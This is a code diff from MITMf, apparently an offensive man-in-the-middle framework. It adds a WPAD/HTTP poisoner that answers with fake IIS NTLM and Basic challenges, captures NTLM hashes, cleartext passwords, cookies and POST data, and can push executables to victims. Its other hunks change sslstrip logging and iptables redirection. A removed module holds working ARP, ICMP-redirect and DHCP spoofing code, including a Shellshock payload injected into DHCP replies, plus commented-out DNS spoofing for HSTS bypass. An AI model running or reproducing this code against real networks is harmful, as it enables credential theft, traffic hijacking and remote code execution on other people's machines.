+        CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
+
+        # Target Name Offsets
+        self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
+        self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
+        self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
+        #AvPairs Offsets
+        self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
+        self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
+        self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
+        #AvPairs StrLen
+        self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
+        self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
+        self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
+        self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
+        self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
+
+#HTTP NTLM packet.
+class IIS_NTLM_Challenge_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWWAuth",       "WWW-Authenticate: NTLM "),
+        ("Payload",       ""),
+        ("Payload-CRLF",  "\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
+        ("Len",           "Content-Length: 0\r\n"),
+        ("CRLF",          "\r\n"),                                            
+    ])
+
+    def calculate(self,payload):
+        self.fields["Payload"] = b64encode(payload)
+
+#HTTP Basic answer packet.
+class IIS_Basic_401_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWW-Auth",      "WWW-Authenticate: Basic realm=''\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("Len",           "Content-Length: 0\r\n"), 
+        ("CRLF",          "\r\n"),                               
+    ])

core/responder/wpad/WPADPoisoner.py

@@ -0,0 +1,238 @@
+import socket
+import threading
+import logging
+
+from HTTPPackets import *
+from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class WPADPoisoner():
+
+	def start(on_off):
+		try:
+			server = ThreadingTCPServer(("0.0.0.0", 80), HTTP)
+			t = threading.Thread(name="HTTP", target=server.serve_forever)
+			t.setDaemon(True)
+			t.start()
+		except Exception, e:
+			mitmf_logger.error("[WPADPoisoner] Error starting on port {}: {}".format(80, e))
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data,client):
+	LMhashLen = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	NthashLen = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+	if NthashLen == 24:
+		NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		HostNameLen = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		outfile = "./logs/responder/HTTP-NTLMv1-Client-"+client+".txt"
+		WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
+		WriteData(outfile,WriteHash, User+"::"+Hostname)
+		mitmf_logger.info('[+]HTTP NTLMv1 hash captured from :%s'%(client))
+		mitmf_logger.info('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
+		mitmf_logger.info('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		mitmf_logger.info('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
+
+	if NthashLen > 24:
+		NthashLen = 64
+		DomainLen = struct.unpack('<H',data[28:30])[0]
+		DomainOffset = struct.unpack('<H',data[32:34])[0]
+		Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		HostNameLen = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName =  data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		outfile = "./logs/responder/HTTP-NTLMv2-Client-"+client+".txt"
+		WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
+		WriteData(outfile,WriteHash, User+"::"+Domain)
+		mitmf_logger.info('[+]HTTP NTLMv2 hash captured from :%s'%(client))
+		mitmf_logger.info('[+]HTTP NTLMv2 User is : %s'%(User))
+		mitmf_logger.info('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
+		mitmf_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
+		mitmf_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
+
+def GrabCookie(data,host):
+	Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
+	if Cookie:
+		CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
+		mitmf_logger.info(CookieStr)
+		return Cookie.group(0)
+	else:
+		NoCookies = "No cookies were sent with this request"
+		mitmf_logger.info(NoCookies)
+		return NoCookies
+
+def WpadCustom(data,client):
+	Wpad = re.search('(/wpad.dat|/*\.pac)', data)
+	if Wpad:
+		buffer1 = WPADScript(Payload=WPAD_Script)
+		buffer1.calculate()
+		return str(buffer1)
+	else:
+		return False
+
+def WpadForcedAuth(Force_WPAD_Auth):
+	if Force_WPAD_Auth == True:
+		return True
+	if Force_WPAD_Auth == False:
+		return False
+
+# Function used to check if we answer with a Basic or NTLM auth.
+def Basic_Ntlm(Basic):
+	if Basic == True:
+		return IIS_Basic_401_Ans()
+	else:
+		return IIS_Auth_401_Ans()
+
+def ServeEXE(data,client, Filename):
+	Message = "[+]Sent %s file sent to: %s."%(Filename,client)
+	mitmf_logger.info(Message)
+	with open (Filename, "rb") as bk:
+		data = bk.read()
+		bk.close()
+		return data
+
+def ServeEXEOrNot(on_off):
+	if Exe_On_Off == "ON":
+		return True
+	if Exe_On_Off == "OFF":
+		return False
+
+def ServeEXECAlwaysOrNot(on_off):
+	if Exec_Mode_On_Off == "ON":
+		return True
+	if Exec_Mode_On_Off == "OFF":
+		return False
+
+def IsExecutable(Filename):
+	exe = re.findall('.exe',Filename)
+	if exe:
+		return True
+	else:
+		return False
+
+def GrabURL(data, host):
+	GET = re.findall('(?<=GET )[^HTTP]*', data)
+	POST = re.findall('(?<=POST )[^HTTP]*', data)
+	POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
+	if GET:
+		HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
+		mitmf_logger.info(HostStr)
+		#print HostStr
+
+	if POST:
+		Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
+		mitmf_logger.info(Host3Str)
+		#print Host3Str
+		if len(''.join(POSTDATA)) >2:
+			PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
+			#print PostData
+			mitmf_logger.info(PostData)
+
+#Handle HTTP packet sequence.
+def PacketSequence(data,client):
+	Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
+	BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+
+	if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
+		File = config.get('HTTP Server', 'ExecFilename')
+		buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
+		buffer1.calculate()
+		return str(buffer1)
+
+	if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+		if IsExecutable(FILENAME):
+			buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
+			buffer1.calculate()
+			return str(buffer1)
+		else:
+			buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
+			buffer1.calculate()
+			return str(buffer1)
+
+	if Ntlm:
+		packetNtlm = b64decode(''.join(Ntlm))[8:9]
+		if packetNtlm == "\x01":
+			GrabURL(data,client)
+			GrabCookie(data,client)
+			r = NTLM_Challenge(ServerChallenge=Challenge)
+			r.calculate()
+			t = IIS_NTLM_Challenge_Ans()
+			t.calculate(str(r))
+			buffer1 = str(t)
+			return buffer1
+		if packetNtlm == "\x03":
+			NTLM_Auth= b64decode(''.join(Ntlm))
+			ParseHTTPHash(NTLM_Auth,client)
+			if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
+				Message = "[+]WPAD (auth) file sent to: %s"%(client)
+				if Verbose:
+					print Message
+				mitmf_logger.info(Message)
+				buffer1 = WpadCustom(data,client)
+				return buffer1
+			else:
+				buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
+				buffer1.calculate()
+				return str(buffer1)
+
+	if BasicAuth:
+		GrabCookie(data,client)
+		GrabURL(data,client)
+		outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt"
+		WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
+		mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
+		if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
+			Message = "[+]WPAD (auth) file sent to: %s"%(client)
+			if Verbose:
+				print Message
+			mitmf_logger.info(Message)
+			buffer1 = WpadCustom(data,client)
+			return buffer1
+		else:
+			buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
+			buffer1.calculate()
+			return str(buffer1)
+
+	else:
+		return str(Basic_Ntlm(Basic))
+
+#HTTP Server Class
+class HTTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(1)
+				data = self.request.recv(8092)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
+					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
+					if Verbose:
+						print Message
+					mitmf_logger.info(Message)
+					self.request.send(buff)
+				else:
+					buffer0 = PacketSequence(data,self.client_address[0])
+					self.request.send(buffer0)
+		except Exception:
+			pass#No need to be verbose..
+			

core/sslstrip/ServerConnection.py

@@ -93,7 +93,14 @@ class ServerConnection(HTTPClient):
         elif 'keylog' in self.uri:
             self.plugins.hook()
         else:
-            mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
+            try:
+                postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
+                if len(postdata) > 0:
+                    mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
+            except UnicodeDecodeError:
+                mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
+                pass
+            
             self.transport.write(self.postData)
 
     def connectionMade(self):
@@ -248,5 +255,3 @@ class ServerConnection(HTTPClient):
                 self.transport.loseConnection()
             except:
                 pass
-
-

core/sslstrip/URLMonitor.py

@@ -18,7 +18,7 @@
 
 import re, os
 import logging
-from core.ConfigWatcher import ConfigWatcher
+from core.configwatcher import ConfigWatcher
 
 mitmf_logger = logging.getLogger('mimtf')
 

core/utils.py

@@ -20,17 +20,66 @@
 #
 
 import os
-import sys
 import random
 import logging
+import re
+import sys
 
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
 from scapy.all import get_if_addr, get_if_hwaddr
 
+mitmf_logger = logging.getLogger('mitmf')
+
+class ImportDir:
+    #---------------------------------------------------------------------------------------------------
+    # http://gitlab.com/aurelien-lourot/importdir
+    #---------------------------------------------------------------------------------------------------
+
+    # File name of a module:
+    __module_file_regexp = "(.+)\.py(c?)$"
+    
+    #---------------------------------------------------------------------------------------------------
+    # Interface
+    #---------------------------------------------------------------------------------------------------
+
+    def do(self, path, env):
+        """ Imports all modules residing directly in directory "path" into the provided environment
+            (usually the callers environment). A typical call:
+            importdir.do("example_dir", globals())
+        """
+        self.__do(path, env)
+
+
+    #---------------------------------------------------------------------------------------------------
+    # Implementation
+    #---------------------------------------------------------------------------------------------------
+
+    def get_module_names_in_dir(self, path):
+        """ Returns a set of all module names residing directly in directory "path".
+        """
+        result = set()
+
+        # Looks for all python files in the directory (not recursively) and add their name to result:
+        for entry in os.listdir(path):
+            if os.path.isfile(os.path.join(path, entry)):
+                regexp_result = re.search(self.__module_file_regexp, entry)
+                if regexp_result: # is a module file name
+                    result.add(regexp_result.groups()[0])
+
+        return result
+
+    def __do(self, path, env):
+        """ Implements do().
+        """
+        sys.path.append(path) # adds provided directory to list we can import from
+        for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module...
+            env[module_name] = __import__(module_name)              # ... import
+
 class SystemConfig:
 
     @staticmethod
     def setIpForwarding(value):
+        mitmf_logger.debug("[Utils] Setting ip forwarding to {}".format(value))
         with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
             file.write(str(value))
             file.close()
@@ -40,11 +89,11 @@ class SystemConfig:
         try:
             ip_address = get_if_addr(interface)
             if (ip_address == "0.0.0.0") or (ip_address is None):
-                sys.exit("[-] Interface {} does not have an assigned IP address".format(interface))
+                exit("[Utils] Interface {} does not have an assigned IP address".format(interface))
 
             return ip_address
         except Exception, e:
-            sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e))
+            exit("[Utils] Error retrieving IP address from {}: {}".format(interface, e))
     
     @staticmethod
     def getMAC(interface):
@@ -52,7 +101,7 @@ class SystemConfig:
             mac_address = get_if_hwaddr(interface)
             return mac_address
         except Exception, e:
-            sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e))
+            exit("[Utils] Error retrieving MAC address from {}: {}".format(interface, e))
 
 class IpTables:
 
@@ -70,15 +119,18 @@ class IpTables:
         return IpTables._instance
 
     def Flush(self):
+        mitmf_logger.debug("[Utils] Flushing iptables")
         os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
         self.dns  = False
         self.http = False
 
     def HTTP(self, http_redir_port):
+        mitmf_logger.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
         os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
         self.http = True
 
     def DNS(self, ip, port):
+        mitmf_logger.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}:{}".format(ip, port))
         os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port))
         self.dns = True
 

core/wrappers/protocols.py

@@ -1,378 +0,0 @@
-#!/usr/bin/env python2.7
-
-# Copyright (c) 2014-2016 Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-
-import logging
-import threading
-import binascii
-import random
-#import dns.resolver
-
-from base64 import b64decode
-from urllib import unquote
-from time import sleep
-#from netfilterqueue import NetfilterQueue
-
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
-from scapy.all import *
-
-mitmf_logger = logging.getLogger('mitmf')
-
-class _DHCP():
-
-	def __init__(self, interface, dhcpcfg, ip, mac):
-		self.interface   = interface
-		self.ip_address  = ip
-		self.mac_address = mac
-		self.shellshock  = None
-		self.debug       = False
-		self.dhcpcfg     = dhcpcfg
-		self.rand_number = []
-		self.dhcp_dic    = {}
-
-	def start(self):
-		t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,))
-		t.setDaemon(True)
-		t.start()
-
-	def dhcp_sniff(self, interface):
-		sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface)
-
-	def dhcp_rand_ip(self):
-		pool = self.dhcpcfg['ip_pool'].split('-')
-		trunc_ip = pool[0].split('.'); del(trunc_ip[3])
-		max_range = int(pool[1])
-		min_range = int(pool[0].split('.')[3])
-		number_range = range(min_range, max_range)
-		for n in number_range:
-			if n in self.rand_number:
-				number_range.remove(n)
-		rand_number = random.choice(number_range)
-		self.rand_number.append(rand_number)
-		rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
-
-		return rand_ip
-
-	def dhcp_callback(self, resp):
-		if resp.haslayer(DHCP):
-			xid = resp[BOOTP].xid
-			mac_addr = resp[Ether].src
-			raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
-			if xid in self.dhcp_dic.keys():
-				client_ip = self.dhcp_dic[xid]
-			else:
-				client_ip = self.dhcp_rand_ip()
-				self.dhcp_dic[xid] = client_ip
-
-			if resp[DHCP].options[0][1] is 1:
-				mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
-				mitmf_logger.info("Sending DHCP OFFER")
-				packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
-				IP(src=self.ip_address, dst='255.255.255.255') /
-				UDP(sport=67, dport=68) /
-				BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
-				DHCP(options=[("message-type", "offer"),
-					('server_id', self.ip_address),
-					('subnet_mask', self.dhcpcfg['subnet']),
-					('router', self.ip_address),
-					('lease_time', 172800),
-					('renewal_time', 86400),
-					('rebinding_time', 138240),
-					"end"]))
-
-				try:
-					packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
-				except KeyError:
-					pass
-
-				sendp(packet, iface=self.interface, verbose=self.debug)
-
-			if resp[DHCP].options[0][1] is 3:
-				mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
-				packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
-				IP(src=self.ip_address, dst='255.255.255.255') /
-				UDP(sport=67, dport=68) /
-				BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
-				DHCP(options=[("message-type", "ack"),
-					('server_id', self.ip_address),
-					('subnet_mask', self.dhcpcfg['subnet']),
-					('router', self.ip_address),
-					('lease_time', 172800),
-					('renewal_time', 86400),
-					('rebinding_time', 138240)]))
-
-				try:
-					packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
-				except KeyError:
-					pass
-
-				if self.shellshock:
-					mitmf_logger.info("Sending DHCP ACK with shellshock payload")
-					packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
-					packet[DHCP].options.append("end")
-				else:
-					mitmf_logger.info("Sending DHCP ACK")
-					packet[DHCP].options.append("end")
-
-				sendp(packet, iface=self.interface, verbose=self.debug)
-
-class _ARP():
-
-	def __init__(self, gateway, interface, mac):
-
-		self.gateway    = gateway
-		self.gatewaymac = getmacbyip(gateway)
-		self.mac        = mac
-		self.target     = None
-		self.targetmac  = None
-		self.interface  = interface
-		self.arpmode    = 'req'
-		self.debug      = False
-		self.send       = True
-		self.arp_inter  = 3
-
-	def start(self):
-		if self.gatewaymac is None:
-			sys.exit("[-] Error: Could not resolve gateway's MAC address")
-
-		if self.target:
-			self.targetmac = getmacbyip(self.target)
-			if self.targetmac is None:
-				sys.exit("[-] Error: Could not resolve target's MAC address")
-
-		if self.arpmode == 'req':
-			pkt = self.build_arp_req()
-		
-		elif self.arpmode == 'rep':
-			pkt = self.build_arp_rep()
-
-		t = threading.Thread(name='arp_spoof', target=self.send_arps, args=(pkt, self.interface, self.debug,))
-		t.setDaemon(True)
-		t.start()
-
-	def send_arps(self, pkt, interface, debug):
-		while self.send:
-			sendp(pkt, inter=self.arp_inter, iface=interface, verbose=debug)
-
-	def stop(self):
-		self.send = False
-		sleep(3)
-		self.arp_inter = 1
-		
-		if self.target:
-			print "\n[*] Re-ARPing target"
-			self.reARP_target(5)
-
-		print "\n[*] Re-ARPing network" 
-		self.reARP_net(5)
-
-	def build_arp_req(self):
-		if self.target is None:
-			pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
-		elif self.target:
-			pkt = Ether(src=self.mac, dst=self.targetmac)/\
-			ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target)
-
-		return pkt
-
-	def build_arp_rep(self):
-		if self.target is None:
-			pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
-		elif self.target:
-			pkt = Ether(src=self.mac, dst=self.targetmac)/\
-			ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target, op=2)
-
-		return pkt
-
-	def reARP_net(self, count):
-		pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
-		ARP(psrc=self.gateway, hwsrc=self.gatewaymac, op=2)
-
-		sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
-
-	def reARP_target(self, count):
-		pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
-		ARP(psrc=self.target, hwsrc=self.targetmac, op=2)
-
-		sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
-
-class _ICMP():
-
-	def __init__(self, interface, target, gateway, ip_address):
-
-		self.target        = target
-		self.gateway       = gateway
-		self.interface     = interface
-		self.ip_address    = ip_address
-		self.debug         = False
-		self.send          = True
-		self.icmp_interval = 2
-
-	def build_icmp(self):
-		pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
-			  IP(src=self.target, dst=self.gateway)/UDP()
-
-		return pkt
-
-	def start(self):
-		pkt = self.build_icmp()
-
-		t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
-		t.setDaemon(True)
-		t.start()
-
-	def stop(self):
-		self.send = False
-		sleep(3)
-
-	def send_icmps(self, pkt, interface, debug):
-		while self.send:
-			sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)
-
-"""
-class _DNS():
-
-	hsts      = False
-	dns       = False
-	hstscfg   = None
-	dnscfg    = None
-	_instance = None
-	nfqueue   = None
-	queue_number = 0
-
-	def __init__(self):
-		self.nfqueue = NetfilterQueue()
-		t = threading.Thread(name='nfqueue', target=self.bind, args=())
-		t.setDaemon(True)
-		t.start()
-
-	@staticmethod
-	def getInstance():
-		if _DNS._instance is None:
-			_DNS._instance = _DNS()
-
-		return _DNS._instance
-
-	@staticmethod
-	def checkInstance():
-		if _DNS._instance is None:
-			return False
-		else:
-			return True
-
-	def bind(self):
-		self.nfqueue.bind(self.queue_number, self.callback)
-		self.nfqueue.run()
-
-	def stop(self):
-		try:
-			self.nfqueue.unbind()
-		except:
-			pass
-
-	def enableHSTS(self, config):
-		self.hsts = True
-		self.hstscfg = config
-
-	def enableDNS(self, config):
-		self.dns = True
-		self.dnscfg = config
-
-	def resolve_domain(self, domain):
-		try:
-			mitmf_logger.debug("Resolving -> %s" % domain)
-			answer = dns.resolver.query(domain, 'A')
-			real_ips = []
-			for rdata in answer:
-				real_ips.append(rdata.address)
-
-			if len(real_ips) > 0:
-				return real_ips
-
-		except Exception:
-			mitmf_logger.info("Error resolving " + domain)
-
-	def callback(self, payload):
-		try:
-			#mitmf_logger.debug(payload)
-			pkt = IP(payload.get_payload())
-
-			if not pkt.haslayer(DNSQR):
-				payload.accept()
-				return
-
-			if pkt.haslayer(DNSQR):
-				mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
-				if self.dns:
-					for k, v in self.dnscfg.items():
-						if k in pkt[DNSQR].qname:
-							self.modify_dns(payload, pkt, v)
-							return
-
-					payload.accept()
-
-				elif self.hsts:
-					if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
-						for k,v in self.hstscfg.items():
-							if v == pkt[DNSQR].qname[:-1]:
-								ip = self.resolve_domain(k)
-								if ip:
-									self.modify_dns(payload, pkt, ip)
-									return
-
-						if 'wwww' in pkt[DNSQR].qname:
-							ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
-							if ip:
-								self.modify_dns(payload, pkt, ip)
-								return
-
-						if 'web' in pkt[DNSQR].qname:
-							ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
-							if ip:
-								self.modify_dns(payload, pkt, ip)
-								return
-
-					payload.accept()
-
-		except Exception, e:
-			print "Exception occurred in nfqueue callback: " + str(e)
-
-	def modify_dns(self, payload, pkt, ip):
-		try:
-			spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
-			UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
-			DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
-
-			if self.hsts:
-				spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
-				for i in ip:
-					spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
-				mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
-				payload.set_payload(str(spoofed_pkt))
-				payload.accept()
-
-			if self.dns:
-				spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) 
-				mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
-				payload.set_payload(str(spoofed_pkt))
-				payload.accept()
-		
-		except Exception, e:
-			print "Exception occurred while modifying DNS: " + str(e)
-"""